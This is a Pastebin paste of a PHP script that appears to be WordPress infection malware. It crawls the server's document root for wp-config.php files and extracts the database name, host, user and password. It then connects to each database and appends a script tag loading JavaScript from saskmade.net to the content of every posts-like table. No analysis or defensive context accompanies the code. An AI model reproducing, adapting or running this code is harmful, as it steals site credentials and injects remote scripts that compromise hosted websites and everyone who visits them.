Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php echo ":#009009#:";
- $file_to_search = "wp-config.php";
- $dop = $_GET['ptz'];
- @search_file($_SERVER['DOCUMENT_ROOT'].$dop,$file_to_search);
- function search_file($dir,$file_to_search){
- $files = scandir($dir);
- foreach($files as $key => $value){
- $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
- if(!is_dir($path)) {
- if (strpos($value,$file_to_search) !== false) {
- show_sitenames($path);
- }
- } else if($value != "." && $value != "..") {
- search_file($path, $file_to_search);
- }
- }
- }
- echo ":#009009#:";
- function show_sitenames($file){
- $content = @file_get_contents($file);
- if(strpos($content, "DB_NAME") !== false) {
- $db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content);
- $host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
- $user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
- $pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);
- // Create connection
- $conn = new mysqli($host, $user, $pass);
- // Check connection
- if ($conn->connect_error) {
- echo $conn->connect_error;
- } else {
- $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
- $result = $conn->query($q);
- if ($result->num_rows > 0) {
- while($row = $result->fetch_assoc()) {
- $q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." LIMIT 1 ";
- $result2 = $conn->query($q2);
- if ($result2->num_rows > 0) {
- while($row2 = $result2->fetch_assoc()) {
- $val = $row2['post_content'];
- if(strpos($val, "saskmade") === false){
- echo "nothing:".$file."\n";
- $q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://saskmade.net/head.js?ver=2.0.0' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%saskmade%'";
- $conn->query($q3);
- } else {
- echo "#already exist#:".$file."\n";
- }
- }
- } else {
- }
- }
- } else {
- }
- $conn->close();
- }
- }
- }
- function get_var_reg($pat,$text) {
- if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
- {
- return $matches[1][0];
- }
- return "";
- }
- exit();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement